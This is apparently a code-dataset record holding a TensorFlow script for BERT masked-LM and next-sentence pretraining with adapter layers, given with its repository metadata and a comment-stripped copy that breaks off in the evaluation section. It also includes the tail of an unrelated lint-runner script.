print("ERROR: %s %s: %s %s, %s: %s" %
(e[0], e[1], e[2], e[3], e[4], e[5]))
return (files_processed, files_with_errors, errors_recorded,
exceptions_recorded)
def rebuild(self):
self.initialize()
(files_processed,
files_with_errors,
errors_recorded,
exceptions_recorded) = self.process(mode=MODE_REBUILD)
if files_with_errors > 0:
print("Rebuild failed. %s files processed, %s had errors, "
"%s errors recorded." % (
files_processed, files_with_errors, errors_recorded))
return 1
self.config.save()
print("Rebuild completed. %s files processed, %s exceptions recorded." %
(files_processed, exceptions_recorded))
return 0
def check(self):
self.config.load()
(files_processed,
files_with_errors,
errors_recorded,
exceptions_recorded) = self.process(mode=MODE_CHECK)
if files_with_errors > 0:
print("Check failed. %s files processed, %s had errors, "
"%s errors recorded." % (
files_processed, files_with_errors, errors_recorded))
return 1
print("Check succeeded. %s files processed" % files_processed)
return 0
def initialize(self):
self.config.save()
return 0
def check():
exit(LintRunner().check())
def rebuild():
exit(LintRunner().rebuild())
def initialize():
exit(LintRunner().initialize())
if __name__ == "__main__":
main()
| true
| true
|
f7050555bf105b4cac50608f7fef5821912f5697
| 18,791
|
py
|
Python
|
training_utility/run_pretraining_adapter.py
|
ai-nikolai/Retrograph-1
|
54bd534d47218ca437c422a1abe5b1e995f55d71
|
[
"Apache-2.0"
] | 14
|
2020-06-01T14:22:43.000Z
|
2022-02-01T15:46:13.000Z
|
training_utility/run_pretraining_adapter.py
|
ai-nikolai/Retrograph-1
|
54bd534d47218ca437c422a1abe5b1e995f55d71
|
[
"Apache-2.0"
] | 8
|
2020-12-17T08:23:46.000Z
|
2021-11-10T14:59:06.000Z
|
training_utility/run_pretraining_adapter.py
|
ai-nikolai/Retrograph-1
|
54bd534d47218ca437c422a1abe5b1e995f55d71
|
[
"Apache-2.0"
] | 5
|
2020-06-01T14:21:17.000Z
|
2021-10-01T09:47:38.000Z
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run masked LM/next sentence masked_lm pre-training for BERT."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from retrograph.modeling import modeling_adapter as modeling
from retrograph.modeling import optimization_adapter as optimization
import tensorflow as tf
flags = tf.flags
FLAGS = flags.FLAGS
## Required parameters
flags.DEFINE_string(
"bert_config_file", None,
"The config json file corresponding to the pre-trained BERT model. "
"This specifies the model architecture.")
flags.DEFINE_string(
"input_file", None,
"Input TF example files (can be a glob or comma separated).")
flags.DEFINE_string(
"output_dir", None,
"The output directory where the model checkpoints will be written.")
## Other parameters
flags.DEFINE_string(
"init_checkpoint", None,
"Initial checkpoint (usually from a pre-trained BERT model).")
flags.DEFINE_integer(
"max_seq_length", 128,
"The maximum total input sequence length after WordPiece tokenization. "
"Sequences longer than this will be truncated, and sequences shorter "
"than this will be padded. Must match data generation.")
flags.DEFINE_integer(
"max_predictions_per_seq", 20,
"Maximum number of masked LM predictions per sequence. "
"Must match data generation.")
flags.DEFINE_bool("do_train", False, "Whether to run training.")
flags.DEFINE_bool("do_eval", False, "Whether to run eval on the dev set.")
flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.")
flags.DEFINE_integer("eval_batch_size", 8, "Total batch size for eval.")
flags.DEFINE_float("learning_rate", 5e-5, "The initial learning rate for Adam.")
flags.DEFINE_integer("num_train_steps", 100000, "Number of training steps.")
flags.DEFINE_integer("num_warmup_steps", 10000, "Number of warmup steps.")
flags.DEFINE_integer("save_checkpoints_steps", 1000,
"How often to save the model checkpoint.")
flags.DEFINE_integer("iterations_per_loop", 1000,
"How many steps to make in each estimator call.")
flags.DEFINE_integer("max_eval_steps", 100, "Maximum number of eval steps.")
flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.")
tf.flags.DEFINE_string(
"tpu_name", None,
"The Cloud TPU to use for training. This should be either the name "
"used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 "
"url.")
tf.flags.DEFINE_string(
"tpu_zone", None,
"[Optional] GCE zone where the Cloud TPU is located in. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string(
"gcp_project", None,
"[Optional] Project name for the Cloud TPU-enabled project. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.")
flags.DEFINE_integer(
"num_tpu_cores", 8,
"Only used if `use_tpu` is True. Total number of TPU cores to use.")
def model_fn_builder(bert_config, init_checkpoint, learning_rate,
num_train_steps, num_warmup_steps, use_tpu,
use_one_hot_embeddings):
"""Returns `model_fn` closure for TPUEstimator."""
def model_fn(features, labels, mode, params): # pylint: disable=unused-argument
"""The `model_fn` for TPUEstimator."""
tf.logging.info("*** Features ***")
for name in sorted(features.keys()):
tf.logging.info(" name = %s, shape = %s" % (name, features[name].shape))
input_ids = features["input_ids"]
input_mask = features["input_mask"]
segment_ids = features["segment_ids"]
masked_lm_positions = features["masked_lm_positions"]
masked_lm_ids = features["masked_lm_ids"]
masked_lm_weights = features["masked_lm_weights"]
next_sentence_labels = features["next_sentence_labels"]
is_training = (mode == tf.estimator.ModeKeys.TRAIN)
model = modeling.BertModel(
config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
(masked_lm_loss,
masked_lm_example_loss, masked_lm_log_probs) = get_masked_lm_output(
bert_config, model.get_sequence_output(), model.get_embedding_table(),
masked_lm_positions, masked_lm_ids, masked_lm_weights)
(next_sentence_loss, next_sentence_example_loss,
next_sentence_log_probs) = get_next_sentence_output(
bert_config, model.get_pooled_output(), next_sentence_labels)
total_loss = masked_lm_loss + next_sentence_loss
tvars = tf.trainable_variables()
initialized_variable_names = {}
scaffold_fn = None
if init_checkpoint:
(assignment_map, initialized_variable_names
) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
if use_tpu:
def tpu_scaffold():
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
return tf.train.Scaffold()
scaffold_fn = tpu_scaffold
else:
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
tf.logging.info("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
init_string)
output_spec = None
if mode == tf.estimator.ModeKeys.TRAIN:
train_op = optimization.create_optimizer(
total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu)
output_spec = tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
loss=total_loss,
train_op=train_op,
scaffold_fn=scaffold_fn)
elif mode == tf.estimator.ModeKeys.EVAL:
def metric_fn(masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,
masked_lm_weights, next_sentence_example_loss,
next_sentence_log_probs, next_sentence_labels):
"""Computes the loss and accuracy of the model."""
masked_lm_log_probs = tf.reshape(masked_lm_log_probs,
[-1, masked_lm_log_probs.shape[-1]])
masked_lm_predictions = tf.argmax(
masked_lm_log_probs, axis=-1, output_type=tf.int32)
masked_lm_example_loss = tf.reshape(masked_lm_example_loss, [-1])
masked_lm_ids = tf.reshape(masked_lm_ids, [-1])
masked_lm_weights = tf.reshape(masked_lm_weights, [-1])
masked_lm_accuracy = tf.metrics.accuracy(
labels=masked_lm_ids,
predictions=masked_lm_predictions,
weights=masked_lm_weights)
masked_lm_mean_loss = tf.metrics.mean(
values=masked_lm_example_loss, weights=masked_lm_weights)
next_sentence_log_probs = tf.reshape(
next_sentence_log_probs, [-1, next_sentence_log_probs.shape[-1]])
next_sentence_predictions = tf.argmax(
next_sentence_log_probs, axis=-1, output_type=tf.int32)
next_sentence_labels = tf.reshape(next_sentence_labels, [-1])
next_sentence_accuracy = tf.metrics.accuracy(
labels=next_sentence_labels, predictions=next_sentence_predictions)
next_sentence_mean_loss = tf.metrics.mean(
values=next_sentence_example_loss)
return {
"masked_lm_accuracy": masked_lm_accuracy,
"masked_lm_loss": masked_lm_mean_loss,
"next_sentence_accuracy": next_sentence_accuracy,
"next_sentence_loss": next_sentence_mean_loss,
}
eval_metrics = (metric_fn, [
masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,
masked_lm_weights, next_sentence_example_loss,
next_sentence_log_probs, next_sentence_labels
])
output_spec = tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
loss=total_loss,
eval_metrics=eval_metrics,
scaffold_fn=scaffold_fn)
else:
raise ValueError("Only TRAIN and EVAL modes are supported: %s" % (mode))
return output_spec
return model_fn
def get_masked_lm_output(bert_config, input_tensor, output_weights, positions,
label_ids, label_weights):
"""Get loss and log probs for the masked LM."""
input_tensor = gather_indexes(input_tensor, positions)
with tf.variable_scope("cls/predictions"):
# We apply one more non-linear transformation before the output layer.
# This matrix is not used after pre-training.
with tf.variable_scope("transform"):
input_tensor = tf.layers.dense(
input_tensor,
units=bert_config.hidden_size,
activation=modeling.get_activation(bert_config.hidden_act),
kernel_initializer=modeling.create_initializer(
bert_config.initializer_range))
input_tensor = modeling.layer_norm(input_tensor)
# The output weights are the same as the input embeddings, but there is
# an output-only bias for each token.
output_bias = tf.get_variable(
"output_bias",
shape=[bert_config.vocab_size],
initializer=tf.zeros_initializer())
logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits, axis=-1)
label_ids = tf.reshape(label_ids, [-1])
label_weights = tf.reshape(label_weights, [-1])
one_hot_labels = tf.one_hot(
label_ids, depth=bert_config.vocab_size, dtype=tf.float32)
# The `positions` tensor might be zero-padded (if the sequence is too
# short to have the maximum number of predictions). The `label_weights`
# tensor has a value of 1.0 for every real prediction and 0.0 for the
# padding predictions.
per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
return (loss, per_example_loss, log_probs)
def get_next_sentence_output(bert_config, input_tensor, labels):
"""Get loss and log probs for the next sentence prediction."""
# Simple binary classification. Note that 0 is "next sentence" and 1 is
# "random sentence". This weight matrix is not used after pre-training.
with tf.variable_scope("cls/seq_relationship"):
output_weights = tf.get_variable(
"output_weights",
shape=[2, bert_config.hidden_size],
initializer=modeling.create_initializer(bert_config.initializer_range))
output_bias = tf.get_variable(
"output_bias", shape=[2], initializer=tf.zeros_initializer())
logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits, axis=-1)
labels = tf.reshape(labels, [-1])
one_hot_labels = tf.one_hot(labels, depth=2, dtype=tf.float32)
per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1)
loss = tf.reduce_mean(per_example_loss)
return (loss, per_example_loss, log_probs)
def gather_indexes(sequence_tensor, positions):
"""Gathers the vectors at the specific positions over a minibatch."""
sequence_shape = modeling.get_shape_list(sequence_tensor, expected_rank=3)
batch_size = sequence_shape[0]
seq_length = sequence_shape[1]
width = sequence_shape[2]
flat_offsets = tf.reshape(
tf.range(0, batch_size, dtype=tf.int32) * seq_length, [-1, 1])
flat_positions = tf.reshape(positions + flat_offsets, [-1])
flat_sequence_tensor = tf.reshape(sequence_tensor,
[batch_size * seq_length, width])
output_tensor = tf.gather(flat_sequence_tensor, flat_positions)
return output_tensor
def input_fn_builder(input_files,
max_seq_length,
max_predictions_per_seq,
is_training,
num_cpu_threads=4):
"""Creates an `input_fn` closure to be passed to TPUEstimator."""
def input_fn(params):
"""The actual input function."""
batch_size = params["batch_size"]
name_to_features = {
"input_ids":
tf.FixedLenFeature([max_seq_length], tf.int64),
"input_mask":
tf.FixedLenFeature([max_seq_length], tf.int64),
"segment_ids":
tf.FixedLenFeature([max_seq_length], tf.int64),
"masked_lm_positions":
tf.FixedLenFeature([max_predictions_per_seq], tf.int64),
"masked_lm_ids":
tf.FixedLenFeature([max_predictions_per_seq], tf.int64),
"masked_lm_weights":
tf.FixedLenFeature([max_predictions_per_seq], tf.float32),
"next_sentence_labels":
tf.FixedLenFeature([1], tf.int64),
}
# For training, we want a lot of parallel reading and shuffling.
# For eval, we want no shuffling and parallel reading doesn't matter.
if is_training:
d = tf.data.Dataset.from_tensor_slices(tf.constant(input_files))
d = d.repeat()
d = d.shuffle(buffer_size=len(input_files))
# `cycle_length` is the number of parallel files that get read.
cycle_length = min(num_cpu_threads, len(input_files))
# `sloppy` mode means that the interleaving is not exact. This adds
# even more randomness to the training pipeline.
d = d.apply(
tf.contrib.data.parallel_interleave(
tf.data.TFRecordDataset,
sloppy=is_training,
cycle_length=cycle_length))
d = d.shuffle(buffer_size=100)
else:
d = tf.data.TFRecordDataset(input_files)
# Since we evaluate for a fixed number of steps we don't want to encounter
# out-of-range exceptions.
d = d.repeat()
# We must `drop_remainder` on training because the TPU requires fixed
# size dimensions. For eval, we assume we are evaluating on the CPU or GPU
# and we *don't* want to drop the remainder, otherwise we wont cover
# every sample.
d = d.apply(
tf.contrib.data.map_and_batch(
lambda record: _decode_record(record, name_to_features),
batch_size=batch_size,
num_parallel_batches=num_cpu_threads,
drop_remainder=True))
return d
return input_fn
def _decode_record(record, name_to_features):
"""Decodes a record to a TensorFlow example."""
example = tf.parse_single_example(record, name_to_features)
# tf.Example only supports tf.int64, but the TPU only supports tf.int32.
# So cast all int64 to int32.
for name in list(example.keys()):
t = example[name]
if t.dtype == tf.int64:
t = tf.to_int32(t)
example[name] = t
return example
def main(_):
tf.logging.set_verbosity(tf.logging.INFO)
if not FLAGS.do_train and not FLAGS.do_eval:
raise ValueError("At least one of `do_train` or `do_eval` must be True.")
bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file)
tf.gfile.MakeDirs(FLAGS.output_dir)
input_files = []
for input_pattern in FLAGS.input_file.split(","):
input_files.extend(tf.gfile.Glob(input_pattern))
tf.logging.info("*** Input Files ***")
for input_file in input_files:
tf.logging.info(" %s" % input_file)
tpu_cluster_resolver = None
if FLAGS.use_tpu and FLAGS.tpu_name:
tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(
FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2
run_config = tf.contrib.tpu.RunConfig(
cluster=tpu_cluster_resolver,
master=FLAGS.master,
model_dir=FLAGS.output_dir,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
keep_checkpoint_max=20,
tpu_config=tf.contrib.tpu.TPUConfig(
iterations_per_loop=FLAGS.iterations_per_loop,
num_shards=FLAGS.num_tpu_cores,
per_host_input_for_training=is_per_host))
model_fn = model_fn_builder(
bert_config=bert_config,
init_checkpoint=FLAGS.init_checkpoint,
learning_rate=FLAGS.learning_rate,
num_train_steps=FLAGS.num_train_steps,
num_warmup_steps=FLAGS.num_warmup_steps,
use_tpu=FLAGS.use_tpu,
use_one_hot_embeddings=FLAGS.use_tpu)
# If TPU is not available, this will fall back to normal Estimator on CPU
# or GPU.
estimator = tf.contrib.tpu.TPUEstimator(
use_tpu=FLAGS.use_tpu,
model_fn=model_fn,
config=run_config,
train_batch_size=FLAGS.train_batch_size,
eval_batch_size=FLAGS.eval_batch_size)
if FLAGS.do_train:
tf.logging.info("***** Running training *****")
tf.logging.info(" Batch size = %d", FLAGS.train_batch_size)
train_input_fn = input_fn_builder(
input_files=input_files,
max_seq_length=FLAGS.max_seq_length,
max_predictions_per_seq=FLAGS.max_predictions_per_seq,
is_training=True)
estimator.train(input_fn=train_input_fn, max_steps=FLAGS.num_train_steps)
if FLAGS.do_eval:
tf.logging.info("***** Running evaluation *****")
tf.logging.info(" Batch size = %d", FLAGS.eval_batch_size)
eval_input_fn = input_fn_builder(
input_files=input_files,
max_seq_length=FLAGS.max_seq_length,
max_predictions_per_seq=FLAGS.max_predictions_per_seq,
is_training=False)
result = estimator.evaluate(
input_fn=eval_input_fn, steps=FLAGS.max_eval_steps)
output_eval_file = os.path.join(FLAGS.output_dir, "eval_results.txt")
with tf.gfile.GFile(output_eval_file, "w") as writer:
tf.logging.info("***** Eval results *****")
for key in sorted(result.keys()):
tf.logging.info(" %s = %s", key, str(result[key]))
writer.write("%s = %s\n" % (key, str(result[key])))
if __name__ == "__main__":
flags.mark_flag_as_required("input_file")
flags.mark_flag_as_required("bert_config_file")
flags.mark_flag_as_required("output_dir")
tf.app.run()
| 37.961616
| 82
| 0.699164
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from retrograph.modeling import modeling_adapter as modeling
from retrograph.modeling import optimization_adapter as optimization
import tensorflow as tf
flags = tf.flags
FLAGS = flags.FLAGS
"bert_config_file", None,
"The config json file corresponding to the pre-trained BERT model. "
"This specifies the model architecture.")
flags.DEFINE_string(
"input_file", None,
"Input TF example files (can be a glob or comma separated).")
flags.DEFINE_string(
"output_dir", None,
"The output directory where the model checkpoints will be written.")
ng(
"init_checkpoint", None,
"Initial checkpoint (usually from a pre-trained BERT model).")
flags.DEFINE_integer(
"max_seq_length", 128,
"The maximum total input sequence length after WordPiece tokenization. "
"Sequences longer than this will be truncated, and sequences shorter "
"than this will be padded. Must match data generation.")
flags.DEFINE_integer(
"max_predictions_per_seq", 20,
"Maximum number of masked LM predictions per sequence. "
"Must match data generation.")
flags.DEFINE_bool("do_train", False, "Whether to run training.")
flags.DEFINE_bool("do_eval", False, "Whether to run eval on the dev set.")
flags.DEFINE_integer("train_batch_size", 32, "Total batch size for training.")
flags.DEFINE_integer("eval_batch_size", 8, "Total batch size for eval.")
flags.DEFINE_float("learning_rate", 5e-5, "The initial learning rate for Adam.")
flags.DEFINE_integer("num_train_steps", 100000, "Number of training steps.")
flags.DEFINE_integer("num_warmup_steps", 10000, "Number of warmup steps.")
flags.DEFINE_integer("save_checkpoints_steps", 1000,
"How often to save the model checkpoint.")
flags.DEFINE_integer("iterations_per_loop", 1000,
"How many steps to make in each estimator call.")
flags.DEFINE_integer("max_eval_steps", 100, "Maximum number of eval steps.")
flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.")
tf.flags.DEFINE_string(
"tpu_name", None,
"The Cloud TPU to use for training. This should be either the name "
"used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 "
"url.")
tf.flags.DEFINE_string(
"tpu_zone", None,
"[Optional] GCE zone where the Cloud TPU is located in. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string(
"gcp_project", None,
"[Optional] Project name for the Cloud TPU-enabled project. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
tf.flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.")
flags.DEFINE_integer(
"num_tpu_cores", 8,
"Only used if `use_tpu` is True. Total number of TPU cores to use.")
def model_fn_builder(bert_config, init_checkpoint, learning_rate,
num_train_steps, num_warmup_steps, use_tpu,
use_one_hot_embeddings):
def model_fn(features, labels, mode, params):
tf.logging.info("*** Features ***")
for name in sorted(features.keys()):
tf.logging.info(" name = %s, shape = %s" % (name, features[name].shape))
input_ids = features["input_ids"]
input_mask = features["input_mask"]
segment_ids = features["segment_ids"]
masked_lm_positions = features["masked_lm_positions"]
masked_lm_ids = features["masked_lm_ids"]
masked_lm_weights = features["masked_lm_weights"]
next_sentence_labels = features["next_sentence_labels"]
is_training = (mode == tf.estimator.ModeKeys.TRAIN)
model = modeling.BertModel(
config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
(masked_lm_loss,
masked_lm_example_loss, masked_lm_log_probs) = get_masked_lm_output(
bert_config, model.get_sequence_output(), model.get_embedding_table(),
masked_lm_positions, masked_lm_ids, masked_lm_weights)
(next_sentence_loss, next_sentence_example_loss,
next_sentence_log_probs) = get_next_sentence_output(
bert_config, model.get_pooled_output(), next_sentence_labels)
total_loss = masked_lm_loss + next_sentence_loss
tvars = tf.trainable_variables()
initialized_variable_names = {}
scaffold_fn = None
if init_checkpoint:
(assignment_map, initialized_variable_names
) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
if use_tpu:
def tpu_scaffold():
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
return tf.train.Scaffold()
scaffold_fn = tpu_scaffold
else:
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
tf.logging.info("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
init_string)
output_spec = None
if mode == tf.estimator.ModeKeys.TRAIN:
train_op = optimization.create_optimizer(
total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu)
output_spec = tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
loss=total_loss,
train_op=train_op,
scaffold_fn=scaffold_fn)
elif mode == tf.estimator.ModeKeys.EVAL:
def metric_fn(masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,
masked_lm_weights, next_sentence_example_loss,
next_sentence_log_probs, next_sentence_labels):
"""Computes the loss and accuracy of the model."""
masked_lm_log_probs = tf.reshape(masked_lm_log_probs,
[-1, masked_lm_log_probs.shape[-1]])
masked_lm_predictions = tf.argmax(
masked_lm_log_probs, axis=-1, output_type=tf.int32)
masked_lm_example_loss = tf.reshape(masked_lm_example_loss, [-1])
masked_lm_ids = tf.reshape(masked_lm_ids, [-1])
masked_lm_weights = tf.reshape(masked_lm_weights, [-1])
masked_lm_accuracy = tf.metrics.accuracy(
labels=masked_lm_ids,
predictions=masked_lm_predictions,
weights=masked_lm_weights)
masked_lm_mean_loss = tf.metrics.mean(
values=masked_lm_example_loss, weights=masked_lm_weights)
next_sentence_log_probs = tf.reshape(
next_sentence_log_probs, [-1, next_sentence_log_probs.shape[-1]])
next_sentence_predictions = tf.argmax(
next_sentence_log_probs, axis=-1, output_type=tf.int32)
next_sentence_labels = tf.reshape(next_sentence_labels, [-1])
next_sentence_accuracy = tf.metrics.accuracy(
labels=next_sentence_labels, predictions=next_sentence_predictions)
next_sentence_mean_loss = tf.metrics.mean(
values=next_sentence_example_loss)
return {
"masked_lm_accuracy": masked_lm_accuracy,
"masked_lm_loss": masked_lm_mean_loss,
"next_sentence_accuracy": next_sentence_accuracy,
"next_sentence_loss": next_sentence_mean_loss,
}
eval_metrics = (metric_fn, [
masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,
masked_lm_weights, next_sentence_example_loss,
next_sentence_log_probs, next_sentence_labels
])
output_spec = tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
loss=total_loss,
eval_metrics=eval_metrics,
scaffold_fn=scaffold_fn)
else:
raise ValueError("Only TRAIN and EVAL modes are supported: %s" % (mode))
return output_spec
return model_fn
def get_masked_lm_output(bert_config, input_tensor, output_weights, positions,
label_ids, label_weights):
input_tensor = gather_indexes(input_tensor, positions)
with tf.variable_scope("cls/predictions"):
with tf.variable_scope("transform"):
input_tensor = tf.layers.dense(
input_tensor,
units=bert_config.hidden_size,
activation=modeling.get_activation(bert_config.hidden_act),
kernel_initializer=modeling.create_initializer(
bert_config.initializer_range))
input_tensor = modeling.layer_norm(input_tensor)
output_bias = tf.get_variable(
"output_bias",
shape=[bert_config.vocab_size],
initializer=tf.zeros_initializer())
logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits, axis=-1)
label_ids = tf.reshape(label_ids, [-1])
label_weights = tf.reshape(label_weights, [-1])
one_hot_labels = tf.one_hot(
label_ids, depth=bert_config.vocab_size, dtype=tf.float32)
per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
return (loss, per_example_loss, log_probs)
def get_next_sentence_output(bert_config, input_tensor, labels):
with tf.variable_scope("cls/seq_relationship"):
output_weights = tf.get_variable(
"output_weights",
shape=[2, bert_config.hidden_size],
initializer=modeling.create_initializer(bert_config.initializer_range))
output_bias = tf.get_variable(
"output_bias", shape=[2], initializer=tf.zeros_initializer())
logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits, axis=-1)
labels = tf.reshape(labels, [-1])
one_hot_labels = tf.one_hot(labels, depth=2, dtype=tf.float32)
per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1)
loss = tf.reduce_mean(per_example_loss)
return (loss, per_example_loss, log_probs)
def gather_indexes(sequence_tensor, positions):
sequence_shape = modeling.get_shape_list(sequence_tensor, expected_rank=3)
batch_size = sequence_shape[0]
seq_length = sequence_shape[1]
width = sequence_shape[2]
flat_offsets = tf.reshape(
tf.range(0, batch_size, dtype=tf.int32) * seq_length, [-1, 1])
flat_positions = tf.reshape(positions + flat_offsets, [-1])
flat_sequence_tensor = tf.reshape(sequence_tensor,
[batch_size * seq_length, width])
output_tensor = tf.gather(flat_sequence_tensor, flat_positions)
return output_tensor
def input_fn_builder(input_files,
max_seq_length,
max_predictions_per_seq,
is_training,
num_cpu_threads=4):
def input_fn(params):
batch_size = params["batch_size"]
name_to_features = {
"input_ids":
tf.FixedLenFeature([max_seq_length], tf.int64),
"input_mask":
tf.FixedLenFeature([max_seq_length], tf.int64),
"segment_ids":
tf.FixedLenFeature([max_seq_length], tf.int64),
"masked_lm_positions":
tf.FixedLenFeature([max_predictions_per_seq], tf.int64),
"masked_lm_ids":
tf.FixedLenFeature([max_predictions_per_seq], tf.int64),
"masked_lm_weights":
tf.FixedLenFeature([max_predictions_per_seq], tf.float32),
"next_sentence_labels":
tf.FixedLenFeature([1], tf.int64),
}
if is_training:
d = tf.data.Dataset.from_tensor_slices(tf.constant(input_files))
d = d.repeat()
d = d.shuffle(buffer_size=len(input_files))
# `cycle_length` is the number of parallel files that get read.
cycle_length = min(num_cpu_threads, len(input_files))
# `sloppy` mode means that the interleaving is not exact. This adds
# even more randomness to the training pipeline.
d = d.apply(
tf.contrib.data.parallel_interleave(
tf.data.TFRecordDataset,
sloppy=is_training,
cycle_length=cycle_length))
d = d.shuffle(buffer_size=100)
else:
d = tf.data.TFRecordDataset(input_files)
# Since we evaluate for a fixed number of steps we don't want to encounter
d = d.repeat()
# every sample.
d = d.apply(
tf.contrib.data.map_and_batch(
lambda record: _decode_record(record, name_to_features),
batch_size=batch_size,
num_parallel_batches=num_cpu_threads,
drop_remainder=True))
return d
return input_fn
def _decode_record(record, name_to_features):
example = tf.parse_single_example(record, name_to_features)
# tf.Example only supports tf.int64, but the TPU only supports tf.int32.
# So cast all int64 to int32.
for name in list(example.keys()):
t = example[name]
if t.dtype == tf.int64:
t = tf.to_int32(t)
example[name] = t
return example
def main(_):
tf.logging.set_verbosity(tf.logging.INFO)
if not FLAGS.do_train and not FLAGS.do_eval:
raise ValueError("At least one of `do_train` or `do_eval` must be True.")
bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file)
tf.gfile.MakeDirs(FLAGS.output_dir)
input_files = []
for input_pattern in FLAGS.input_file.split(","):
input_files.extend(tf.gfile.Glob(input_pattern))
tf.logging.info("*** Input Files ***")
for input_file in input_files:
tf.logging.info(" %s" % input_file)
tpu_cluster_resolver = None
if FLAGS.use_tpu and FLAGS.tpu_name:
tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(
FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2
run_config = tf.contrib.tpu.RunConfig(
cluster=tpu_cluster_resolver,
master=FLAGS.master,
model_dir=FLAGS.output_dir,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
keep_checkpoint_max=20,
tpu_config=tf.contrib.tpu.TPUConfig(
iterations_per_loop=FLAGS.iterations_per_loop,
num_shards=FLAGS.num_tpu_cores,
per_host_input_for_training=is_per_host))
model_fn = model_fn_builder(
bert_config=bert_config,
init_checkpoint=FLAGS.init_checkpoint,
learning_rate=FLAGS.learning_rate,
num_train_steps=FLAGS.num_train_steps,
num_warmup_steps=FLAGS.num_warmup_steps,
use_tpu=FLAGS.use_tpu,
use_one_hot_embeddings=FLAGS.use_tpu)
# If TPU is not available, this will fall back to normal Estimator on CPU
# or GPU.
estimator = tf.contrib.tpu.TPUEstimator(
use_tpu=FLAGS.use_tpu,
model_fn=model_fn,
config=run_config,
train_batch_size=FLAGS.train_batch_size,
eval_batch_size=FLAGS.eval_batch_size)
if FLAGS.do_train:
tf.logging.info("***** Running training *****")
tf.logging.info(" Batch size = %d", FLAGS.train_batch_size)
train_input_fn = input_fn_builder(
input_files=input_files,
max_seq_length=FLAGS.max_seq_length,
max_predictions_per_seq=FLAGS.max_predictions_per_seq,
is_training=True)
estimator.train(input_fn=train_input_fn, max_steps=FLAGS.num_train_steps)
if FLAGS.do_eval:
tf.logging.info("***** Running evaluation *****")
tf.logging.info(" Batch size = %d", FLAGS.eval_batch_size)
eval_input_fn = input_fn_builder(
input_files=input_files,
max_seq_length=FLAGS.max_seq_length,
max_predictions_per_seq=FLAGS.max_predictions_per_seq,
is_training=False)
